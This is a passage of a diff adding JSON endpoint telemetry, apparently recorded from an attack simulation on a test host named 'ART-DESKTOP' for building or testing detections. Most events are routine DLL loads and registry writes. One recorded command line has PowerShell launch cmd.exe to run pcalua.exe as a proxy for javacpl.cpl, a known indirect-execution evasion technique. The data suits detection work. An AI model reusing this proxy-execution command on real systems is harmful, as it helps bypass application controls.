"unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": "SequenceNumber", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574013520000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574013640000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3920, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574014000000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "registry", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "command_line": "pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7392, + "ppid": 3920, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883574014090000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}", + "unique_ppid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 